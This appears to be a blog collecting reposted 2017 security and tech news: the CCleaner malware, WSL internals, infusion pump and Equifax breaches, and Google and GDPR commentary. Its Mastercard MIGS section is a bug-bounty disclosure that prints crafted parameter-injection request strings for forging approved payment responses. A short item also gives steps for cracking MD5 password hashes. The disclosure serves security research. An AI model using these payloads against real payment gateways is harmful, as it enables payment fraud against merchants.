CCleaner hacked to distribute Malware

If you have downloaded or updated CCleaner application on your computer between August 15 and September 12 of this year from its official website, then pay attention—your computer has been compromised.

Avast and Piriform have both confirmed that the Windows 32-bit version of CCleaner v5.33.6162 and CCleaner Cloud v1.07.3191 were affected by the malware.

Detected on 13 September, the malicious version of CCleaner contains a multi-stage malware payload that steals data from infected computers and sends it to attacker’s remote command-and-control servers.

Moreover, the unknown hackers signed the malicious installation executable (v5.33) using a valid digital signature issued to Piriform by Symantec and used Domain Generation Algorithm (DGA), so that if attackers’ server went down, the DGA could generate new domains to receive and send stolen information.

“All of the collected information was encrypted and encoded by base64 with a custom alphabet,” says Paul Yung, V.P. of Products at Piriform. “The encoded information was subsequently submitted to an external IP address 216.126.x.x (this address was hardcoded in the payload, and we have intentionally masked its last two octets here) via a HTTPS POST request.”

The malicious software was programmed to collect a large number of user data, including:

• Computer name
• List of installed software, including Windows updates
• List of all running processes
• IP and MAC addresses
• Additional information like whether the process is running with admin privileges and whether it is a 64-bit system.

How to Remove Malware From Your PC

According to the Talos researchers, around 5 million people download CCleaner (or Crap Cleaner) each week, which indicates that more than 20 Million people could have been infected with the malicious version the app.

“The impact of this attack could be severe given the extremely high number of systems possibly affected. CCleaner claims to have over 2 billion downloads worldwide as of November 2016 and is reportedly adding new users at a rate of 5 million a week,” Talos said.

However, Piriform estimated that up to 3 percent of its users (up to 2.27 million people) were affected by the malicious installation.

Affected users are strongly recommended to update their CCleaner software to version 5.34 or higher, in order to protect their computers from being compromised. The latest version is available for download here.

Reference:

https://thehackernews.com/2017/09/ccleaner-hacked-malware.html

Advertisements

Windows for Linux Nerds

You can learn a lot more about this from the Windows Subsystem for Linux Overview. I will go over some of the parts I found to be the most interesting.

The Windows NT kernel was designed from the beginning to support running POSIX, OS/2, and other subsystems. In the early days, these were just user-mode programs that would interact with ntdll to perform system calls. Since the Windows NT kernel supported POSIX there was already a fork system call implemented in the kernel. However, the Windows NT call for fork, NtCreateProcess, is not directly compatible with the Linux syscall so it has some special handling you can read about more under System Calls.

There are both user and kernel mode parts to WSL. Below is a diagram showing the basic Windows kernel and user modes alongside the WSL user and kernel modes.

The blue boxes represent kernel components and the green boxes are Pico Processes. The LX Session Manager Service handles the life cycle of Linux instances. LXCore and lxsys, lxcore.sys and lxss.sys respectively, translate the Linux syscalls into NT APIs.

Pico Processes

As you can see in the diagram above, init and /bin/bash are Pico processes. Pico processes work by having system calls and user mode exceptions dispatched to a paired driver. Pico processes and drivers allow Windows Subsystem for Linux to load executable ELF binaries into a Pico process’ address space and execute them on top of a Linux-compatible layer of system calls.

You can read even more in depth on this from the MSDN Pico Processes post.

System Calls

One of the first things I did in WSL was run a syscall fuzzer. I knew it would break but it was interesting for the purposes of figuring out which syscalls had been implemented without looking at the source. This was how I realized PID and mount namespaces were already implemented into cloneand unshare!

The WSL kernel drivers, lxss.sys and lxcore.sys, handle the Linux system call requests and translate them to the Windows NT kernel. None of this code came from the Linux kernel, it was all re-implemented by Windows engineers. This is truly mind blowing.

When a syscall is made from a Linux executable it gets passed to lxcore.syswhich will translate it into the equivalent Windows NT call. For example, open to NtOpenFile and kill to NTTerminateProcess. If there is no mapping then the Windows kernel mode driver will handle the request directly. This was the case for fork, which has lxcore.sys prepare the process to be copied and then call the appropriate Windows NT kernel APIs to create and copy the process.

You can learn more from the MSDN System Calls post.

Launching Windows Executables

Since WSL allows for running Linux binaries natively (without a VM), this allows for some really fun interactions.

You can actually spawn Windows binaries from WSL. Linux ELF binaries get handled by lxcore.sys and lxss.sys as described above and Windows binaries go through the typical Windows userspace.

You can even launch Windows GUI apps as well this way! Imagine a Linux setup where you can launch PowerPoint without a VM…. well this is it!!

Launching X Applications

You can also run X Applications in WSL. You just need an X server. I usedvcxsrv to try it out. I run i3 on all my Linux machines and tried it out in WSL like my awesome coworker Brian Ketelsen did in his blog post.

The hidpi is a little gross but if you play with the settings for the X server you can get it to a tolerable place. While I think this is neat for running whatever X applications you love, personally I am going to stick to using tmux as my entrypoint for WSL and using the Windows GUI apps I need vs. Linux X applications. This just feels less heavy (remember, I love minimal) and I haven’t come across an X application I can not live without for the time being. It’s nice to know X applications can work when I do need something though. 🙂

Pain Points

There are still quite a few pain points with using Windows Subsystem for Linux, but it’s important to remember it is still in it’s beginnings. So that you all have an idea of what to expect I will list them here and we can watch how they improve in future builds. Each item links to it’s respective GitHub issue.

Keep in mind, I am using the default Windows console for everything. It has improved significantly since I played with it 2 years ago while we were working on porting the Docker client and daemon to Windows. 🙂

• Copy/Paste: I am used to using ctrl-shift-v and ctrl-shift-c for copy paste in a terminal and of course those don’t work. From what I can tellenter is copy… supa weird… and ctrl-v says it’s paste. Of course it doesn’t work for me. I can get paste to work by two-finger clicking in the term, but that does not work in vim and it’s a pretty weird interaction.
• Scroll: This might just be a huge pet peeve of mine but the scroll should not be able to scroll down to nothing. This happens all the time by accident for me with the mouse and I have no idea why the terminal is rendering more space down there. Also typing after I have scrolled should return me back to the console place where I am typing. It unfortunately does not.
• Files Slow: Saving a lot of files to disk is super slow. This applies for example to git clones, unpacking tarballs and more. Windows is not used to applications that save a lot of files so this is being worked on to be more performant. Obviously the unix way of “everything is a file” does not scale well when saving a lot of small files is super slow.
• Sharing Files between Windows and WSL: Right now, like I pointed out, your Windows filesystem is mounted as /mnt/c in WSL. But you can’t quite yet have a git repo cloned in WSL and then also edit from Windows. The VolFS file system, all file paths that don’t begin with /mnt, such as /home, is much closer to Linux standards. If you need to access files in VolFS, you can use bash.exe to copy them somewhere under /mnt/c, use Windows to do whatever on it, then use bash.exe to copy them back when you are done. You can also all Visual Studio code on the file from WSL and that will work. 🙂

Setting Up a Windows Machine in a Reproducible Way

This was super important to me since I am used to Linux where everything is scriptable and I have scripts for starting from a blank machine to my exact perfect setup. A few people mentioned I should check outboxstarter.org for making this possible on Windows.

Turns out it works super well! My gist for my machine lives on github. There is another powershell script there for uninstalling a few programs. I love all things minimal so I like to uninstall applications I will never use. I also learned some cool powershell commands for listing all your installed applications.

#--- List all installed programs --#
Get-ItemProperty
HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*
| Select-Object DisplayName, DisplayVersion, Publisher, InstallDate
|Format-Table -AutoSize

#--- List all store-installed programs --#
Get-AppxPackage | Select-Object Name, PackageFullName, Version |Format-Table
-AutoSize

I am going to be scripting more of this out in the future with regard to pinning applications to the taskbar in powershell and a bunch of other settings. Stay tuned.

Reference

https://blog.jessfraz.com/post/windows-for-linux-nerds/

Mastercard Internet Gateway Service: Hashing Design Flaw

Last year I found a design error in the MD5 version of the hashing method used by Mastercard Internet Gateway Service. The flaw allows modification of transaction amount.  They have awarded me with a bounty for reporting it. This year, they have switched to HMAC-SHA256, but this one also has a flaw (and no response from MasterCard).

If you just want to know what the bug is, just skip to the Flaw part.

What is MIGS?

When you pay on a website, the website owner usually just connects their system to an intermediate payment gateway (you will be forwarded to another website). This payment gateway then connects to several payments system available in a country. For credit card payment, many gateways will connect to another gateway (one of them is MIGS) which works with many banks to provide 3DSecure service.

How does it work?

The payment flow is usually like this if you use MIGS:

1. You select items from an online store (merchant)
2. You enter your credit card number on the website
3. The card number, amount, etc is then signed and returned to the browser which will auto POST to intermediate payment gateway
4. The intermediate payment gateway will convert the format to the one requested by MIGS, sign it (with MIGS key), and return it to the browser. Again this will auto POST, this time to MIGS server.
5. If 3D secure not requested, then go to step 6. If 3D secure is requested, MIGS will redirect the request to the bank that issues the card, the bank will ask for an OTP, and then it will generate HTML that will auto POST data to MIGS
6. MIGS will return a signed data to the browser, and will auto POST the data back to the intermediate Gateway
7. Intermediate Gateway will check if the data is valid or not based on the signature. If it is not valid, then error page will be generated
8. Based on MIGS response, payment gateway will forward the status to the merchant

Notice that instead of communicating directly between servers, communications are done via user’s browser, but everything is signed. In theory, if the signing process and verification process is correct then everything will be fine. Unfortunately, this is not always the case.

Flaw in the MIGS MD5 Hashing

This bug is extremely simple. The hashing method used is:

MD5(Secret + Data)

But it was not vulnerable to hash length extension attack (some checks were done to prevent this). The data is created like this: for every query parameter that starts with vpc_, sort it, then concatenate the values only, without delimiter. For example, if we have this data:

Name: Joe
Amount: 10000
Card: 1234567890123456

vpc_Name=Joe&Vpc_Amount=10000&vpc_Card=1234567890123456

Sort it:

vpc_Amount=10000
vpc_Card=1234567890123456
vpc_Name=Joe

Get the values, and concatenate it:

100001234567890123456Joe

Note that if I change the parameters:

vpc_Name=Joe&Vpc_Amount=1&vpc_Card=1234567890123456&vpc_B=0000

Sort it:

vpc_Amount=1
vpc_B=0000
vpc_Card=1234567890123456
vpc_Name=Joe

Get the values, and concatenate it:

100001234567890123456Joe

The MD5 value is still the same. So basically, when the data is being sent to MIGS, we can just insert additional parameter after the amount to eat the last digits, or to the front to eat the first digits, the amount will be slashed, and you can pay a 2000 USD MacBook with 2 USD.

Intermediate gateways and merchant can work around this bug by always checking that the amount returned by MIGS is indeed the same as the amount requested.

MasterCard rewarded me with 8500 USD for this bug.

Flaw in the  HMAC-SHA256 Hashing

The new HMAC-SHA256 has a flaw that can be exploited if we can inject invalid values to intermediate payment gateways. I have tested that at least one payment gateway (Fusion Payments) have this bug. I was rewarded 500 USD from Fusion Payments. It may affect other Payment gateways that connect to MIGS.

In the new version, they have added delimiters (&) between fields,  added field names and not just values, and used HMAC-SHA256.  For the same data above, the hashed data is:

Vpc_Amount=10000&vpc_Card=1234567890123456&vpc_Name=Joe

We can’t shift anything, everything should be fine. But what happens if a value contains & or = or other special characters?

Reading this documentation, it says that:

Note: The values in all name value pairs should NOT be URL encoded for the purpose of hashing.

The “NOT” is my emphasis. It means that if we have these fields:

Amount=100
Card=1234
CVV=555

It will be hashed as: HMAC(Amount=100&Card=1234&CVV=555)

And if we have this (amount contains the & and =)

Amount=100&Card=1234
CVV=555

It will be hashed as: HMAC(Amount=100&Card=1234&CVV=555)

The same as before. Still not really a problem at this point.

Of course, I thought that may be the documentation is wrong, may be it should be encoded. But I have checked the behavior of the MIGS server, and the behavior is as documented. May be they don’t want to deal with different encodings (such as + instead of %20).

There doesn’t seem to be any problem with that, any invalid values will be checked by MIGS and will cause an error (for example invalid amount above will be rejected).

But I noticed that in several payment gateways, instead of validating inputs on their server side, they just sign everything it and give it to MIGS. It’s much easier to do just JavaScript checking on the client side, sign the data on the server side, and let MIGS decide whether the card number is correct or not, or should the CVV be 3 or 4 digits, is the expiration date correct, etc. The logic is: MIGS will recheck the inputs, and will do it better.

On Fusion Payments, I found out that it is exactly what happened: they allow any characters of any length to be sent for the CVV (only checked in JavaScript), they will sign the request and send it to MIGS.

Exploit

To exploit this we need to construct a string which will be a valid request, and also a valid MIGS server response. We don’t need to contact MIGS server at all, we are forcing the client to sign a valid data for themselves.

A basic request looks like this:

vpc_AccessCode=9E33F6D7&vpc_Amount=25&vpc_Card=Visa&vpc_CardExp=1717&vpc_CardNum=4599777788889999&vpc_CardSecurityCode=999&vpc_OrderInfo=ORDERINFO&vpc_SecureHash=THEHASH&vpc_SecureHashType=SHA256

and a basic response from the server will look like this:

vpc_Message=Approved&vpc_OrderInfo=ORDERINFO&vpc_ReceiptNo=722819658213&vpc_TransactionNo=2000834062&vpc_TxnResponseCode=0&vpc_SecureHash=THEHASH&vpc_SecureHashType=SHA256

In the Fusion Payment’s case, the exploit is done by injecting  vpc_CardSecurityCode (CVV)

vpc_AccessCode=9E33F6D7&vpc_Amount=25&vpc_Card=Visa&vpc_CardExp=1717&vpc_CardNum=4599777788889999&vpc_CardSecurityCode=999%26vpc_Message%3DApproved%26vpc_OrderInfo%3DORDERINFO%26vpc_ReceiptNo%3D722819658213%26vpc_TransactionNo%3D2000834062%26vpc_TxnResponseCode%3D0%26vpc_Z%3Da&vpc_OrderInfo=ORDERINFO&vpc_SecureHash=THEHASH&vpc_SecureHashType=SHA256

The client/payment gateway will generate the correct hash for this string

Now we can post this data back to the client itself (without ever going to MIGS server), but we change it slightly so that the client will read the correct variables (most client will only check forvpc_TxnResponseCode, and vpc_TransactionNo):

vpc_AccessCode=9E33F6D7%26vpc_Amount%3D25%26vpc_Card%3DVisa%26vpc_CardExp%3D1717%26vpc_CardNum%3D4599777788889999%26vpc_CardSecurityCode%3D999&vpc_Message=Approved&vpc_OrderInfo=ORDERINFO&vpc_ReceiptNo=722819658213&vpc_TransactionNo=2000834062&vpc_TxnResponseCode=0&vpc_Z=a%26vpc_OrderInfo%3DORDERINFO&vpc_SecureHash=THEHASH&vpc_SecureHashType=SHA256

Note that:

1. This will be hashed the same as the previous data
2. The client will ignore vpc_AccessCode and the value inside it
3. The client will process the vpc_TxnResponseCode, etc and assume the transaction is valid

It can be said that this is a MIGS client bug, but the hashing method chosen by MasterCard allows this to happen, had the value been encoded, this bug will not be possible.

Response from MIGS

MasterCard did not respond to this bug in the HMAC-SHA256. When reporting I have CC-ed it to several persons that handled the previous bug. None of the emails bounced. Not even a “we are checking this” email from them. They also have my Facebook in case they need to contact me (this is from the interaction about the MD5 bug).

Some people are sneaky and will try to deny that they have received a bug report, so now when reporting a bug, I put it in a password protected post (that is why you can see several password-protected posts in this blog). So far at least 3 views from MasterCard IP address (3 views that enter the password).  They have to type in a password to read the report, so it is impossible for them to accidentally click it without reading it. I have nagged them every week for a reply.

My expectation was that they would try to warn everyone connecting to their system to check and filter for injections.

Flaws In Payment Gateways

As an extra note: even though payment gateways handle money, they are not as secure as people think. During my pentests  I found several flaws in the design of the payment protocol on several intermediate gateways. Unfortunately, I can’t go into detail on this one(when I say “pentests”, it means something under NDA).

I also found flaws in the implementation. For example Hash Length Extension Attack, XML signature verification error, etc. One of the simplest bugs that I found is in Fusion Payments. The first bug that I found was: they didn’t even check the signature from MIGS. That means we can just alter the data returned by MIGS and mark the transaction as successful. This just means changing a single character from F (false) to 0 (success).

So basically we can just enter any credit card number, got a failed response from MIGS, change it, and suddenly payment is successful. This is a 20 million USD company, and I got 400 USD for this bug.  This is not the first payment gateway that had this flaw, during my pentest I found this exact bug in another payment gateway. Despite the relatively low amount of bounty, Fusion Payments is currently the only payment gateway that I contacted that is very clear in their bug bounty program, and is very quick in responding my emails and fixing their bugs.

Conclusion

Payment gateways are not as secure as you think.

reference:

http://tinyhack.com/2017/09/05/mastercard-internet-gateway-service-hashing-design-flaw/

Hackers can remotely access syringe infusion pumps to deliver fatal overdoses

Medical devices are increasingly found vulnerable to hacking. Earlier this month, the US Food and Drug Administration (FDA) recalled 465,000 pacemakers after they were found vulnerable to hackers.

Now, it turns out that a syringe infusion pump used in acute care settings could be remotely accessed and manipulated by hackers to impact the intended operation of the device, ICS-CERT warned in an advisory issued on Thursday.

An independent security researcher has discovered not just one or two, but eight security vulnerabilities in the Medfusion 4000 Wireless Syringe Infusion Pump, which is manufactured by Minnesota-based speciality medical device maker Smiths Medical.

The devices are used across the world for delivering small doses of medication in acute critical care, such as neonatal and pediatric intensive care and the operating room.

Some of these vulnerabilities discovered by Scott Gayou are high in severity that can easily be exploited by a remote attacker to “gain unauthorized access and impact the intended operation of the pump.”

According to the ICS-CERT, “Despite the segmented design, it may be possible for an attacker to compromise the communications module and the therapeutic module of the pump.”

The most critical vulnerability (CVE-2017-12725) has been given a CVSS score of 9.8 and is related to the use of hard-coded usernames and passwords to automatically establish a wireless connection if the default configuration is not changed.

The high-severity flaws include:

• A buffer overflow bug (CVE-2017-12718) that could be exploited for remote code execution on the target device in certain conditions.
• Lack of authentication (CVE-2017-12720) if the pump is configured to allow FTP connections.
• Presence of hard-coded credentials (CVE-2017-12724) for the pump’s FTP server.
• Lack of proper host certificate validation (CVE-2017-12721), leaving the pump vulnerable to man-in-the-middle (MitM) attacks.

The remaining are medium severity flaws which could be exploited by attackers to crash the communications and operational modules of the device, authenticate to telnet using hard-coded credentials, and obtain passwords from configuration files.

These vulnerabilities impact devices that are running versions 1.1, 1.5 and 1.6 of the firmware, and Smiths Medical has planned to release a new product version 1.6.1 in January 2018 to address these issues.

But in the meantime, healthcare organizations are recommended to apply some defensive measures including assigning static IP addresses to pumps, monitoring network activity for malicious servers, installing the pump on isolated networks, setting strong passwords, and regularly creating backups until patches are released.

Reference:

https://thehackernews.com/2017/09/hacking-infusion-pumps.html

Comment:

1. No hard coded passwords should be used in *any* device, this includes medical devices.
2. They are using FTP?  Are you joking?  The mere presence of an FTP would fail PCI compliance for a bank.  The reason that a bank can’t use it, is the same reason the medical devices arena should not use it.

Equifax Announces Cybersecurity Incident – 143 million US Citizens

No Evidence of Unauthorized Access to Core Consumer or Commercial Credit Reporting Databases

Company to Offer Free Identity Theft Protection and Credit File Monitoring to All U.S. Consumers

September 7, 2017 — Equifax Inc. (NYSE: EFX) today announced a cybersecurity incident potentially impacting approximately 143 million U.S. consumers. Criminals exploited a U.S. website application vulnerability to gain access to certain files. Based on the company’s investigation, the unauthorized access occurred from mid-May through July 2017. The company has found no evidence of unauthorized activity on Equifax’s core consumer or commercial credit reporting databases.

The information accessed primarily includes names, Social Security numbers, birth dates, addresses and, in some instances, driver’s license numbers. In addition, credit card numbers for approximately 209,000 U.S. consumers, and certain dispute documents with personal identifying information for approximately 182,000 U.S. consumers, were accessed. As part of its investigation of this application vulnerability, Equifax also identified unauthorized access to limited personal information for certain UK and Canadian residents. Equifax will work with UK and Canadian regulators to determine appropriate next steps. The company has found no evidence that personal information of consumers in any other country has been impacted.

FOLLOW THE MONEY…

How three Equifax execs sold $1.8million of stock days after massive data breach – which wasn’t revealed to the public for more than SIX WEEKS

• Equifax says the three company executives who sold stock days after company discovered major security breach were not aware of the hack at the time 
• On Thursday, company disclosed a cyberattack that ran from May to July which exposed Social Security numbers and sensitive data of 143 million Americans 
• The hack itself was discovered by the company on July 29
• Days later, Chief Financial Officer John Gamble and two other executives, Rodolfo Ploder and Joseph Loughran, sold a combined $1.8million in stock 
• Insider trading is a federal offense punishable by a maximum prison sentence of 20 years and a $5million fine, according to the SEC

 

Reference:

https://www.equifaxsecurity2017.com/

http://www.dailymail.co.uk/news/article-4864148/3-Equifax-executives-sold-stock-hack-revealed.html

Vivaldi boss: It’d be cool if Google went back to the ‘not evil’ schtick

The founder of the web browser Opera has accused Google of “anti-competitive” practices.

“A monopoly both in search and advertising, Google, unfortunately shows that they are not able to resist the misuse of power,” wrote Jon von Tetzchner, now CEO of Vivaldi, in a blog post on Monday.

He also intimated there may have been a connection between an interview published in tech glad-rag WIRED, where he criticised data gathering and ad targeting by Google and Facebook, and the suspension of Vivaldi’s Google AdWords accounts two days later.

“Was this just a coincidence?” he wrote. “Or was it deliberate, a way of sending a message?”

The Opera founder said Vivaldi was able to work with Google’s requirements in order to lift the suspension “after almost three months”.

“I am saddened by this makeover of a geeky, positive company into the bully they are in 2017,” he wrote. “It is also fair to say that Google is now in a position where regulation is needed.

What Von Tetzchner is suggesting, if true, would be remarkably mean-spirited, and we certainly don’t have any insight into whether his allegations are accurate, but Google has form on the antitrust front.

In June, EU regulators fined it €2.4bn for illegally promoting its shopping service ahead of others (it submitted a plan for dealing with that in August). Google has faced several regulation-linked court cases in and outside the European Union.

Comment:

I agree with this statement.  Google’s Appendix A, which states both “do no evil” and that a search engine cannot be controlled by a commercial entity.

They argued that commerce would corrupt the nature of the search results, and today we see their initial thoughts to be true.

Google knew they would be corrupted by money, and stated it right when the company were forming.  Pay attention to Appendix A… its priceless.

Reference:

https://www.theregister.co.uk/2017/09/05/opera_founder_adwords_blasts_google/

Password Cracking – MD5 hashes

There’s a new online MD5 cracking database, that has the largest hacking database of over 20 TRILLION hashes.

I tested out the password “dragon” and “toor” and the database instantly decrypted the password hashes.

1. Step 1 – hash a password
   http://www.miraclesalad.com/webtools/md5.php
2. Step 2 – crack that hash here
   http://www.cmd5.org/

 

Global race for AI will ‘most likely cause’ WWIII as computers launch 1st strike – Musk

Competition for superiority in Artificial Intelligence at national level will “most likely” cause World War Three, billionaire entrepreneur Elon Musk has said, warning that an AI may deem first use its best chance of winning.

“China, Russia, soon all countries with strong computer science. Competition for AI superiority at national level most likely cause of WW3,” Musk tweeted.

China, Russia, soon all countries w strong computer science. Competition for AI superiority at national level most likely cause of WW3 imo.

— Elon Musk (@elonmusk) September 4, 2017

It will likely not even be the countries’ leaders that start the war, Musk elaborated, but “one of the AI’s, if it [AI] decides that a pre-emptive strike is most probable path to victory.”

May be initiated not by the country leaders, but one of the AI’s, if it decides that a prepemptive strike is most probable path to victory

— Elon Musk (@elonmusk) September 4, 2017

The SpaceX founder says he doubts that North Korea can launch its own nuclear strike. He believes that Pyongyang “launching a nuclear missile would be suicide for their leadership, as South Korea, [the U.S.] and China would invade and end the regime immediately.”

https://www.rt.com/usa/401957-ww3-ai-musk-strike/

DuckDuckGo – Doubled in Size in 2017 – Private Search Engine

In 2013, Edward Snowden released documents proving that the NSA was conducting warrantless online surveillance at a massive scale, something many had already suspected. In the subsequent year, many people have sought out more secure software to help ensure that their digital privacy remains intact. Groups such as the Electronic Frontier Foundation have subsequently promoted alternatives to popular software which can be easily adopted; such as DuckDuckGo to replace Google. As a result, DuckDuckGo’s popularity has skyrocketed.

According to newest stats from Alexa.com, DuckDuckGo has almost doubled its global popularity in the past year – ranked as the 400th most popular website. When you dig down to the national scale, it’s ranked 255th in the US, 177th in Germany, 186th in France, 193rd in the UK, and 715th in China. The search engine is far more popular than other privacy oriented search engines such as Ixquick or Searx.

DuckDuckGo has been a bit of a magnet for privacy-oriented folk with it promising not to store personal information, track you around with ads, or in any other fashion. The search engine appeals to power users as well, with its more advanced features like ‘bangs’ which are essentially prefixes that allow you to search websites directly; for example, adding !w as a prefix in search will lead to Wikipedia directly.

 

In August, DuckDuckGo surpassed 18 million direct searches per day towards the end of the month; the average for the month was 16,739,317 per day. While quite impressive, the figures still pale in comparison to Google which as of May 2016 handled two trillion searches per year.

 

https://www.neowin.net/news/duckduckgo-almost-doubled-its-popularity-in-the-past-year

GDPR – European Privacy – Discussion of the European views on CONSENT

It is well documented that the American cultural understanding of privacy is the inverse of the European view of privacy, and this particularly applies to what determines CONSENT by the individual.  We have all been horrified by the Internet terms of Facebook and Google who bully the user into reading war and peace sized documents, for each app installed.

Europe is about to enact the GDPR – to curtail the abuses of personal data on the internet, where is it used without knowledge or consent.  Massive fines will apply to corporations who do not apply the GDPR.

Go Europe!

Consent

Consent under the GDPR must be a freely given, specific, informed and unambiguous indication of the individual’s wishes. There must be some form of clear affirmative action – or in other words, a positive opt-in – consent cannot be inferred from silence, pre-ticked boxes or inactivity. Consent must also be separate from other terms and conditions, and you will need to provide simple ways for people to withdraw consent. Public authorities and employers will need to take particular care to ensure that consent is freely given.

User can withdraw consent without penalty

Consent has to be verifiable, and individuals generally have more rights where you rely on consent to process their data.

Remember that you can rely on other lawful bases apart from consent – for example, where processing is necessary for the purposes of your organisation’s or a third party’s legitimate interests.

You are not required to automatically ‘repaper’ or refresh all existing DPA consents in preparation for the GDPR. But if you rely on individuals’ consent to process their data, make sure it will meet the GDPR standard on being specific, granular, clear, prominent, opt-in, properly documented and easily withdrawn. If not, alter your consent mechanisms and seek fresh GDPR-compliant consent, or find an alternative to consent.

Further reading in the GDPR

• See Articles 4(11), 6(1)(a), 7, 8, 9(2)(a) and Recitals 32, 38, 40, 42, 43, 51, 59, 171

  External link

Next steps for the Article 29 Working Party

The Article 29 Working Party are due to publish guidelines on consent in 2017 and the latest timetable is for this to be agreed and adopted in December 2017.

 

Authors summary

*Marketing purposes = disallowed as consent

*Research purposes = disallowed as consent

*Pre ticked opt in boxes = disallowed as consent

*Takes 100 years to find the means to delete consent = disallowed as consent

The current business model of the Internet, where you are forced into consenting that they can resell your data to millions of third parties is about to be halted.  Go Europe!

 

Reference:

https://ico.org.uk/for-organisations/data-protection-reform/overview-of-the-gdpr/key-areas-to-consider/

https://ico.org.uk/media/about-the-ico/consultations/2013551/draft-gdpr-consent-guidance-for-consultation-201703.pdf